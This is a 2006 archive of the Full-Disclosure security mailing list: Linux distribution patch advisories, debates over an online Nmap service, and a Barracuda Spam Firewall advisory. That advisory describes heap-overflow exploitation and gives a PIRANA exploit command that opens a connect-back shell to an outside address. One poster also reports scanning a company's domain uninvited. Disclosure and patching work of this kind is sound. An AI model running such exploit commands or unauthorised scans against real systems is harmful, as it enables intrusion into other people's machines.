corporate/3.0/i586/xine-gnomevfs-1-0.rc3.6.14.C30mdk.i586.rpm 18168e188258d645ba33103a743af3cb corporate/3.0/i586/xine-plugins-1-0.rc3.6.14.C30mdk.i586.rpm 11ff55c81b52559ff1b08bab917d63db corporate/3.0/SRPMS/xine-lib-1-0.rc3.6.14.C30mdk.src.rpm Corporate 3.0/X86_64: fad4ae51ebdd06fe3b3f7848994bc7f0 corporate/3.0/x86_64/lib64xine1-1-0.rc3.6.14.C30mdk.x86_64.rpm 0aeb5bb0a613d0fa13788c7f2c64c871 corporate/3.0/x86_64/lib64xine1-devel-1-0.rc3.6.14.C30mdk.x86_64.rpm 755ab190b656fdbb9313189cce7f5a80 corporate/3.0/x86_64/xine-aa-1-0.rc3.6.14.C30mdk.x86_64.rpm ecf0b4ee0c12d1506432c297080bbb67 corporate/3.0/x86_64/xine-arts-1-0.rc3.6.14.C30mdk.x86_64.rpm 8433359eaa5ec8987efe65e6ada96132 corporate/3.0/x86_64/xine-esd-1-0.rc3.6.14.C30mdk.x86_64.rpm bbb1ac4807f1e8a7960d8704c79c6134 corporate/3.0/x86_64/xine-flac-1-0.rc3.6.14.C30mdk.x86_64.rpm 356f64f53ce7d552acc239cde30b60ea corporate/3.0/x86_64/xine-gnomevfs-1-0.rc3.6.14.C30mdk.x86_64.rpm 4661d21604ad2b6d2443e1ba357a9491 corporate/3.0/x86_64/xine-plugins-1-0.rc3.6.14.C30mdk.x86_64.rpm 11ff55c81b52559ff1b08bab917d63db corporate/3.0/SRPMS/xine-lib-1-0.rc3.6.14.C30mdk.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2.2 (GNU/Linux) iD8DBQFFdgJvmqjQ0CJFipgRAsGsAKC/hIBRO42PeuMhjv0q1Pe6S7SDigCg3Q90 6ILMjlqmpJ/U+9ga8dyvKZs= =MYl3 -----END PGP SIGNATURE----- From simon at snosoft.com Wed Dec 6 02:52:27 2006 From: simon at snosoft.com (Simon Smith) Date: Tue, 05 Dec 2006 21:52:27 -0500 Subject: [Full-disclosure] Nmap Online In-Reply-To: <456BF10D.9080400@matousec.com> Message-ID: Why would you do this? On 11/28/06 3:19 AM, "David Matousek" wrote: > Hello, > > For all Nmap fans, our group have implemented Nmap Online service. > Its address is http://nmap-online.com/. The interface allows you to perform > custom > Nmap scans from our server with only a few limitations in the syntax. > The service is free and can be used immediately, no registration is required. > > Please direct your questions and suggestions to our emails. > > > Regards, From simon at snosoft.com Wed Dec 6 02:42:11 2006 From: simon at snosoft.com (Simon Smith) Date: Tue, 05 Dec 2006 21:42:11 -0500 Subject: [Full-disclosure] SSH brute force blocking tool In-Reply-To: <242a0a8f0611271320q60d1f507hd929961db1decd59@mail.gmail.com> Message-ID: You have experience in disarming land mines with a hammer while you are stark naked? Now that?s a real man?s job! On 11/27/06 4:20 PM, "Brian Eaton" wrote: > On 11/27/06, J. Oquendo wrote: >> There is no hocus pocus here. Look at /var/log/secure and fine the term >> "error retrieving" and print the next line, 13th column. Then sort it and >> print the unique entries into /tmp/hosts.deny. After you do this, compare >> /tmp/hosts.deny with /etc/hosts.deny and put the differences not in >> /etc/hosts.deny >> into /etc/hosts.deny > > Parsing malicious input with shell commands is like disarming land mines with > a hammer. > > And doing it as root? That's like disarming land mines with a hammer while > you're stark naked. > > Regards, > Brian > > > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061205/ce91355a/attachment.html From edcarp at gmail.com Wed Dec 6 03:05:51 2006 From: edcarp at gmail.com (Ed Carp) Date: Tue, 5 Dec 2006 20:05:51 -0700 Subject: [Full-disclosure] Nmap Online In-Reply-To: References: <456BF10D.9080400@matousec.com> Message-ID: <1b0d006c0612051905h39ce657bh214cf60a48be253d@mail.gmail.com> On 12/5/06, Simon Smith wrote: > Why would you do this? Well, for one, sometimes you need to do a port scan when you're not in front of a system that has nmap installed on it. I get a call about once every couple of months, "why can't I get into my email server" that's sitting behind a hardware router with a hole poked in it for port 110. Doing a port scan on the client's IP address ensures that either yes, the port is open or no, it's not. If it's open then I can proceed with my troubleshooting - if not, I know where to look for the problem. From kees at ubuntu.com Wed Dec 6 03:23:27 2006 From: kees at ubuntu.com (Kees Cook) Date: Tue, 5 Dec 2006 19:23:27 -0800 Subject: [Full-disclosure] [USN-390-2] evince vulnerability Message-ID: <20061206032327.GJ6550@outflux.net> =========================================================== Ubuntu Security Notice USN-390-2 December 06, 2006 evince vulnerability CVE-2006-5864 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 5.10 Ubuntu 6.06 LTS Ubuntu 6.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 5.10: evince 0.4.0-0ubuntu4.3 Ubuntu 6.06 LTS: evince 0.5.2-0ubuntu3.2 Ubuntu 6.10: evince 0.6.1-0ubuntu1.2 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: USN-390-1 fixed a vulnerability in evince. The original fix did not fully solve the problem, allowing for a denial of service in certain situations. Original advisory details: A buffer overflow was discovered in the PostScript processor included in evince. By tricking a user into opening a specially crafted PS file, an attacker could crash evince or execute arbitrary code with the user's privileges. Updated packages for Ubuntu 5.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.4.0-0ubuntu4.3.diff.gz Size/MD5: 11703 57da8bfc0ad787ae9c8ecd69c517249c http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.4.0-0ubuntu4.3.dsc Size/MD5: 1873 72d17a9bdb8a65e1a240834099cfdbe6 http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.4.0.orig.tar.gz Size/MD5: 1172276 9c1009e3dae55bcda1bc5204f021ad1b amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.4.0-0ubuntu4.3_amd64.deb Size/MD5: 652508 2815d3389a1260c6388485b71c3bb5b1 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.4.0-0ubuntu4.3_i386.deb Size/MD5: 602688 3f7768319e1d5f8f3a3131cf23856c86 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.4.0-0ubuntu4.3_powerpc.deb Size/MD5: 637256 0c2653001eb6c40e0a3228f8dd49598f sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.4.0-0ubuntu4.3_sparc.deb Size/MD5: 616900 ade92071c11fd148af61ec3f57900ea3 Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.5.2-0ubuntu3.2.diff.gz Size/MD5: 11818 e485f45171c5558cb7d7fec930f050ba http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.5.2-0ubuntu3.2.dsc Size/MD5: 1977 15a5db1f73061fbf0d468e9c4a8fe0c7 http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.5.2.orig.tar.gz Size/MD5: 1362513 5020afb1768d89c251ad8c2a233d9fcf amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.5.2-0ubuntu3.2_amd64.deb Size/MD5: 747902 8f75cb0125481699918dfd23c3d81718 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.5.2-0ubuntu3.2_i386.deb Size/MD5: 692882 392d072d36c0c200f14ff44c5dd40858 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.5.2-0ubuntu3.2_powerpc.deb Size/MD5: 729070 d5053fd093002988670243a050f8be1f sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.5.2-0ubuntu3.2_sparc.deb Size/MD5: 704756 19aa53d800f922641d8660417a982fc4 Updated packages for Ubuntu 6.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.6.1-0ubuntu1.2.diff.gz Size/MD5: 7742 31f26b98ab68c5c9f7bb9a133ddec8f3 http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.6.1-0ubuntu1.2.dsc Size/MD5: 1679 6e3252457e5c8703932a04804c2af514 http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.6.1.orig.tar.gz Size/MD5: 1687870 665387e278d4da97f7540aeddeaae57d amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.6.1-0ubuntu1.2_amd64.deb Size/MD5: 944244 bbcc0ea3a31c4f71c528dbf4d144f0e3 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.6.1-0ubuntu1.2_i386.deb Size/MD5: 901854 ab0b5badc19b9c7665dee69ab937dd02 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.6.1-0ubuntu1.2_powerpc.deb Size/MD5: 926276 fda07c35d1f38589f515720772888785 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.6.1-0ubuntu1.2_sparc.deb Size/MD5: 895824 f94e53b05c5985f9b4fa0889ac2b55c8 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061205/0835453f/attachment.bin From full-disclosure3 at pchandyman.com.au Wed Dec 6 03:45:39 2006 From: full-disclosure3 at pchandyman.com.au (Greg) Date: Wed, 6 Dec 2006 14:45:39 +1100 Subject: [Full-disclosure] Nmap Online In-Reply-To: <1b0d006c0612051905h39ce657bh214cf60a48be253d@mail.gmail.com> Message-ID: > -----Original Message----- > From: Ed Carp [mailto:edcarp at gmail.com] > Sent: Wednesday, 6 December 2006 2:06 PM > To: full-disclosure at lists.grok.org.uk > Cc: David Matousek > Subject: Re: [Full-disclosure] Nmap Online > > > > On 12/5/06, Simon Smith wrote: > > > Why would you do this? > > Well, for one, sometimes you need to do a port scan when > you're not in front of a system that has nmap installed on > it. I get a call about once every couple of months, "why > can't I get into my email server" that's sitting behind a > hardware router with a hole poked in it for port 110. Doing > a port scan on the client's IP address ensures that either > yes, the port is open or no, it's not. If it's open then I > can proceed with my troubleshooting - if not, I know where to > look for the problem. > I don't wish to upset anyone but that answer has to be the craziest FIRST "port of call" approach I have seen used. I get plenty of those sorts of calls. I take about 30 seconds time on the phone for almost all of them. I say "Pull the power plug out of the router. Wait 10 seconds, plug it back in and wait another 10 seconds. OK, try now" and almost all of them report it works well. So why would I need and how could I use Nmap online to tell me the router went crazy and locked up? Besides, wouldn't it be just as easy to use the Nmap sitting on my computer if I decided I needed to use it? Greg. From jean-sebastien at guay-leroux.com Wed Dec 6 04:48:05 2006 From: jean-sebastien at guay-leroux.com (=?ISO-8859-1?Q?Jean-S=E9bastien_Guay-Leroux?=) Date: Tue, 05 Dec 2006 23:48:05 -0500 Subject: [Full-disclosure] Barracuda Convert-UUlib library buffer overflow leads to remote compromise Message-ID: <45764B85.40707@guay-leroux.com> Topic: Barracuda Convert-UUlib library buffer overflow leads to remote compromise Announced: 2006-12-05 Product: Barracuda Spam Firewall Vendor: http://www.barracudanetworks.com/ Impact: Remote shell access Affected product: Barracuda Spam Firewall with firmware < 3.3.15.026 AND virus definition < 2.0.325 Credits: Jean-S?bastien Guay-Leroux CVE ID: CVE-2005-1349 I. BACKGROUND The Barracuda Spam Firewall is an integrated hardware and software solution for complete protection of your email server. It provides a powerful, easy to use, and affordable solution to eliminating spam and virus from your organization by providing the following protection: * Anti-spam * Anti-virus * Anti-spoofing * Anti-phishing * Anti-spyware (Attachments) * Denial of Service II. DESCRIPTION In 2005, Mark Martinec and Robert Lewis found a flaw in the Convert- UUlib library. Few details were published regarding this flaw. After some research, I found that the flaw was in the part of the code where BinHex files were getting parsed. By supplying an invalid size for the resource fork or data fork in a BinHex's file header, it is possible to create a heap overflow. By taking advantage of the sequentials calls to free(), it's possible to overwrite more than 4 bytes. In fact, we can write a jmpcode in memory that will jump to one of our registers containing the location of our shellcode. By using this technique, the exploit will be much more reliable. You will only need to supply a return location address to the exploit code. You do NOT need to have remote administration access (on port 8000) for successfull exploitation. For further informations about the details of the bugs, check the exploit code. III. IMPACT Gain shell access to the remote Barracuda Spam Firewall. IV. PROOF OF CONCEPT Using the PIRANA framework, available at http://www.guay-leroux.com , it is possible to test the Barracuda Spam Firewall against the Convert-UUlib vulnerability. The version 0.3.1 of the PIRANA framework incorporates a new module to exploit the Convert-UUlib library bug. It contains three hardcoded offsets that should reliably exploit every Barracuda Spam Firewall with a firmware below 3.3.15.026 and virus definition below 2.0.325. By calling PIRANA the way it is described below, you will get a TCP connect back shell on IP address 1.2.3.4 and port 1234: perl pirana.pl -e 5 -h barracuda.vulnerable.com -a postmaster -s 0 \ -l 1.2.3.4 -p 1234 V. VERSIONS AFFECTED This affects firmware releases before versions 3.3.15.026. This is no longer an issue with Barracuda's customers with current Energize Updates, running virus definition 2.0.325, released Nov. 29, 2006. It is recommended that Barracuda's customers upgrade to the latest generally available release. VI. CREDITS Mark Martinec and Robert Lewis found the original flaw in Convert- UUlib. Jean-S?bastien Guay-Leroux conducted further research on the bug and produced an exploitation plugin for the PIRANA framework. VII. REFERENCES http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1349 VIII. HISTORY 2005-04-26 : Bug is disclosed by Mark Martinec and Robert Lewis. 2006-08-?? : Convert-UUlib module exploit written for PIRANA. 2006-11-28 : Barracuda Networks is notified about the problem. 2006-11-28 : Barracuda Networks acknowledged the problem. 2006-11-29 : Barracuda Networks published a fix. 2006-12-05 : Advisory is disclosed to the public. From cowboy at cavein.org Wed Dec 6 04:55:52 2006 From: cowboy at cavein.org (Richard A Nelson) Date: Tue, 5 Dec 2006 20:55:52 -0800 (PST) Subject: [Full-disclosure] Nmap Online In-Reply-To: References: Message-ID: On Wed, 6 Dec 2006, Greg wrote: > I don't wish to upset anyone but that answer has to be the craziest FIRST > "port of call" approach I have seen used. I get plenty of those sorts of > calls. I take about 30 seconds time on the phone for almost all of them. I > say "Pull the power plug out of the router. Wait 10 seconds, plug it back in > and wait another 10 seconds. OK, try now" and almost all of them report it > works well. That is heavily target market specific... Whilst I offer the same line to some friends and family, others I wouldn't dare start there (out of respect - they've already done everything obvious before asking for help). > Besides, wouldn't it be just as easy to use the Nmap sitting on my computer > if I decided I needed to use it? If only it was always that easy... I just moved, and whilst the ISP is the same, the CLEC is new - new lines, new IP, some newer softare, etc. I need to verify *my* setup, so: * my local nmap is useless * my work boxen are heavily firewalled - even outbound * my accounts elsewhere usually don't have nmap available to non-admins (and I shy from that role unless needed). So... For me, this has been an great service, and I'm sure I'm not alone. -- Rick Nelson Life'll kill ya -- Warren Zevon Then you'll be dead -- Life'll kill ya From edcarp at gmail.com Wed Dec 6 05:00:30 2006 From: edcarp at gmail.com (Ed Carp) Date: Tue, 5 Dec 2006 22:00:30 -0700 Subject: [Full-disclosure] Nmap Online In-Reply-To: References: <1b0d006c0612051905h39ce657bh214cf60a48be253d@mail.gmail.com> Message-ID: <1b0d006c0612052100p5e9f86a2uf3946a9b860939d4@mail.gmail.com> On 12/5/06, Greg wrote: > I don't wish to upset anyone but that answer has to be the craziest FIRST > "port of call" approach I have seen used. I get plenty of those sorts of Who said it was the first thing that was tried? And you just can't pull the plug on a router in a production shop. From noodle.mastah at gmail.com Tue Dec 5 20:36:45 2006 From: noodle.mastah at gmail.com (chinese soup) Date: Tue, 5 Dec 2006 21:36:45 +0100 Subject: [Full-disclosure] eEye's Zero-Day Tracker Launch Message-ID: http://eeyeresearch.typepad.com/blog/ http://research.eeye.com/html/alerts/zeroday/index.html "If something is reported as a non-exploitable bug, we'll make sure to exhaust the flaw for exploitability, as we have shown with the ASX Playlist and the ADODB.Connection ActiveX zero-day vulnerabilities." Or.. FUD? 1.) Adobe ActiveX http://research.eeye.com/html/alerts/zeroday/20061128.html "Although there was no supplied proof of concept for these vulnerabilities, releasing the method names as well as the fact that they are 'memory corruption' errors and 'could be exploited by attackers to take complete control of an affected system' without a vendor-supplied patch will put many Adobe users at risk." And.. "Remote Code Execution: Yes" Now wait a second, I thought that you guys were going to "make sure to exhaust the flaw for exploitability"? Did you actually try this out that you can say Remote Code Execution is possible? 2.) ASX Playlist http://research.eeye.com/html/alerts/zeroday/20061122.html Now this is fun. "Severity: High Remote Code Execution: Yes" "As a result, a two- or four-byte heap overflow is possible if the "REF HREF" URL features a protocol shorter than three characters (the length of "mms")." Ok. But wait, what's this sentence doing here: "Exploitability due to the corruption of the adjacent heap block's header has not yet been demonstrated but is assumed likely." So... you ASSUMED that it is likely, even though you can only have up to a 4-byte overwrite which does not overwrite the needed pointers in order to actually exploit this, yet you say "Yes" in Remote Code Execution? trippin-out, "noodles for long life!" -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061205/151b792d/attachment.html From mail4anub15 at gmail.com Wed Dec 6 07:24:59 2006 From: mail4anub15 at gmail.com (aNub15) Date: Wed, 6 Dec 2006 08:24:59 +0100 Subject: [Full-disclosure] Hail list! Message-ID: <001a01c71907$a4d0c7c0$ee725740$@com> Hail list... Could someone with a bit more experience (than me) please verify a few things. I came over a job listing yesterday (sys admin) for a Norwegian company called rubrikk.no. The guy who posted it clearly knows nothing about computers, talking about Windows server 2005, and maintaining perl and reg.ex servers (go figure). I ran a quick scan on the domain and found 54 vulns! (GFI Languard) Netcraft says BSD, but why then is he talking about Winblows. Please tell me I found a honeypot? If not, please shut down the computer, it should not be on the internet!!! ---- I also have a couple of questions about software firewalls/routers: 1. M0n0wall or SmoothWall? 2. Looking for a low footprint windows firewall that's only supposed to do one thing. If someone hits port 110, block the I.P for a week? (should take care of most portscanners (skiddies)). And no I'm not worried about blocking real users on the box. Regards Simon www.supernoia.com From joey at infodrom.org Wed Dec 6 11:55:43 2006 From: joey at infodrom.org (Martin Schulze) Date: Wed, 6 Dec 2006 12:55:43 +0100 (CET) Subject: [Full-disclosure] [SECURITY] [DSA 1229-1] New Asterisk packages fix arbitrary code execution Message-ID: <20061206115543.9AF9DFDE1@finlandia.home.infodrom.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -------------------------------------------------------------------------- Debian Security Advisory DSA 1229-1 security at debian.org http://www.debian.org/security/ Martin Schulze December 6th, 2006 http://www.debian.org/security/faq - -------------------------------------------------------------------------- Package : asterisk Vulnerability : integer overflow Problem type : remote Debian-specific: no CVE ID : CVE-2006-5444 CERT advisory : VU#521252 BugTraq ID : 20617 Adam Boileau discovered an integer overflow in the Skinny channel driver in Asterisk, an Open Source Private Branch Exchange or telephone system, as used by Cisco SCCP phones, which allows remote attackers to execute arbitrary code. For the stable distribution (sarge) this problem has been fixed in version 1.0.7.dfsg.1-2sarge4. For the unstable distribution (sid) this problem has been fixed in version 1.2.13~dfsg-1. We recommend that you upgrade your asterisk packages. Upgrade Instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given at the end of this advisory: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - -------------------------------- Source archives: http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1-2sarge4.dsc Size/MD5 checksum: 1259 2441c1ccc8467ecefc45b58711b9602f http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1-2sarge4.diff.gz Size/MD5 checksum: 70588 17c8aaae715230d9ea8d0485eb7cfe95 http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1.orig.tar.gz Size/MD5 checksum: 2929488 0d0f718ccd7a06ab998c3f637df294c0 Architecture independent components: http://security.debian.org/pool/updates/main/a/asterisk/asterisk-config_1.0.7.dfsg.1-2sarge4_all.deb Size/MD5 checksum: 61616 84dd16720f492033c5c034b69f033f7f http://security.debian.org/pool/updates/main/a/asterisk/asterisk-dev_1.0.7.dfsg.1-2sarge4_all.deb Size/MD5 checksum: 83382 0fda6ac9d47e7d5bcd9786c7ab17ebd5 http://security.debian.org/pool/updates/main/a/asterisk/asterisk-doc_1.0.7.dfsg.1-2sarge4_all.deb Size/MD5 checksum: 1577766 a5ddadc5ba22723d32a74a2bc4fb9dfc http://security.debian.org/pool/updates/main/a/asterisk/asterisk-sounds-main_1.0.7.dfsg.1-2sarge4_all.deb Size/MD5 checksum: 1180298 bf9fae8e20a5e299d1c24e5fce59ee96 http://security.debian.org/pool/updates/main/a/asterisk/asterisk-web-vmail_1.0.7.dfsg.1-2sarge4_all.deb Size/MD5 checksum: 28378 eb425bfc6db224dd17346c0a03f06853 Alpha architecture: http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1-2sarge4_alpha.deb Size/MD5 checksum: 1477714 2835395f4796f717330ec4bc6decca4e http://security.debian.org/pool/updates/main/a/asterisk/asterisk-gtk-console_1.0.7.dfsg.1-2sarge4_alpha.deb Size/MD5 checksum: 31406 03e9021f5867a19500fadd3e27563e47 http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.0.7.dfsg.1-2sarge4_alpha.deb Size/MD5 checksum: 21444 06a45fc8f1407adfdcaf1453e1cd0874 AMD64 architecture: http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1-2sarge4_amd64.deb Size/MD5 checksum: 1333338 73a991fc324d71d53a375dd81b9eb8e2 http://security.debian.org/pool/updates/main/a/asterisk/asterisk-gtk-console_1.0.7.dfsg.1-2sarge4_amd64.deb Size/MD5 checksum: 30832 21bde76d77e7948ec115c0752e025353 http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.0.7.dfsg.1-2sarge4_amd64.deb Size/MD5 checksum: 21444 c426ea519c9a806039aec64fc58083fc ARM architecture: http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1-2sarge4_arm.deb Size/MD5 checksum: 1262870 4e73f23ddaadabb52c1f06b37e1c520e http://security.debian.org/pool/updates/main/a/asterisk/asterisk-gtk-console_1.0.7.dfsg.1-2sarge4_arm.deb Size/MD5 checksum: 29544 7d7f780f79006309910f2f6a66e06818 http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.0.7.dfsg.1-2sarge4_arm.deb Size/MD5 checksum: 21444 e50e31d85cc4835fc0023b02d4a19b39 HP Precision architecture: http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1-2sarge4_hppa.deb Size/MD5 checksum: 1448202 32dd05dd323f87a5e2af536e49985faa http://security.debian.org/pool/updates/main/a/asterisk/asterisk-gtk-console_1.0.7.dfsg.1-2sarge4_hppa.deb Size/MD5 checksum: 31476 46142d857caf78277934f9e89711b41a http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.0.7.dfsg.1-2sarge4_hppa.deb Size/MD5 checksum: 21450 56f2cebadeabe4f099cf9399f55a589f Intel IA-32 architecture: http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1-2sarge4_i386.deb Size/MD5 checksum: 1171606 2810bc5ffb85764e07e7ec706dc4f928 http://security.debian.org/pool/updates/main/a/asterisk/asterisk-gtk-console_1.0.7.dfsg.1-2sarge4_i386.deb Size/MD5 checksum: 29836 0daf81e64c836885f14b2dbf0f54343b http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.0.7.dfsg.1-2sarge4_i386.deb Size/MD5 checksum: 21442 b0a56bf68687633b5965fd5bc48ada95 Intel IA-64 architecture: http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1-2sarge4_ia64.deb Size/MD5 checksum: 1771294 ed00a12ab45bd6f81da7214fc4f0b99d http://security.debian.org/pool/updates/main/a/asterisk/asterisk-gtk-console_1.0.7.dfsg.1-2sarge4_ia64.deb Size/MD5 checksum: 32960 4f4e2c882189638bfee0f4e25868ab2b http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.0.7.dfsg.1-2sarge4_ia64.deb Size/MD5 checksum: 21442 1b642cf09597da3404c55d42b6ff0ae7 Motorola 680x0 architecture: http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1-2sarge4_m68k.deb Size/MD5 checksum: 1184854 de5fd7c0533e64861c7446c651777fd3 http://security.debian.org/pool/updates/main/a/asterisk/asterisk-gtk-console_1.0.7.dfsg.1-2sarge4_m68k.deb Size/MD5 checksum: 30224 0967fd0088ec26799999c267a258bb81 http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.0.7.dfsg.1-2sarge4_m68k.deb Size/MD5 checksum: 21462 5d19189f30b74bd2112d09a340946cf9 Big endian MIPS architecture: http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1-2sarge4_mips.deb Size/MD5 checksum: 1264012 fabd550d77fe25c7e717f29bb3bf1355 http://security.debian.org/pool/updates/main/a/asterisk/asterisk-gtk-console_1.0.7.dfsg.1-2sarge4_mips.deb Size/MD5 checksum: 29430 efd332bdb454dc03e3e2dc63bdd65ce8 http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.0.7.dfsg.1-2sarge4_mips.deb Size/MD5 checksum: 21448 ff71d10748a00ef5f1c3d4b8632d929f Little endian MIPS architecture: http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1-2sarge4_mipsel.deb Size/MD5 checksum: 1270346 07d3e2bc2677a460f27187264fafe80e http://security.debian.org/pool/updates/main/a/asterisk/asterisk-gtk-console_1.0.7.dfsg.1-2sarge4_mipsel.deb Size/MD5 checksum: 29366 49499b7916c27d1ede70eddc64505be0 http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.0.7.dfsg.1-2sarge4_mipsel.deb Size/MD5 checksum: 21450 530e7eb9d1a395faa2fd19dffaf2db6e PowerPC architecture: http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1-2sarge4_powerpc.deb Size/MD5 checksum: 1425172 dae96f2c81168d452cd05b70316632db http://security.debian.org/pool/updates/main/a/asterisk/asterisk-gtk-console_1.0.7.dfsg.1-2sarge4_powerpc.deb Size/MD5 checksum: 31166 86982177ea3ab8dd23daa989e976c316 http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.0.7.dfsg.1-2sarge4_powerpc.deb Size/MD5 checksum: 21444 fafe504d906ab206c8c66c558ca866c5 IBM S/390 architecture: http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1-2sarge4_s390.deb Size/MD5 checksum: 1312516 8b8425df65ae5d632b0f8f1da6fb4c38 http://security.debian.org/pool/updates/main/a/asterisk/asterisk-gtk-console_1.0.7.dfsg.1-2sarge4_s390.deb Size/MD5 checksum: 30846 1ab2adb0c24b96a0c8a43480cd0a5f68 http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.0.7.dfsg.1-2sarge4_s390.deb Size/MD5 checksum: 21442 0e283bcb7f6c4992e99ae7f823c557f3 Sun Sparc architecture: http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1-2sarge4_sparc.deb Size/MD5 checksum: 1274282 aa531e9c0c268dfabf222092b5b61e51 http://security.debian.org/pool/updates/main/a/asterisk/asterisk-gtk-console_1.0.7.dfsg.1-2sarge4_sparc.deb Size/MD5 checksum: 29812 3a64e2bccfc0479263d2aa8d00b2cb68 http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.0.7.dfsg.1-2sarge4_sparc.deb Size/MD5 checksum: 21450 c9f916ccce73e0c25360affd739543e5 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (GNU/Linux) iD8DBQFFdq++W5ql+IAeqTIRAoTLAKCr+6Dr+P2PbVVM2p1aKcdCUIrlagCeK+QC /J3Yurq3X4CBeFGRSXpAeTc= =AMcA -----END PGP SIGNATURE----- From schalulleke at gmail.com Wed Dec 6 08:11:03 2006 From: schalulleke at gmail.com (Schanulleke) Date: Wed, 06 Dec 2006 09:11:03 +0100 Subject: [Full-disclosure] Nmap Online In-Reply-To: References: Message-ID: <45767B17.9000103@gmail.com> Simon Smith wrote: > Why would you do this? > >> For all Nmap fans, our group have implemented Nmap Online service. >> Its address is http://nmap-online.com/. The interface allows you to perform >> custom Because you like lawers and being in court? From timo.schoeler at riscworks.net Wed Dec 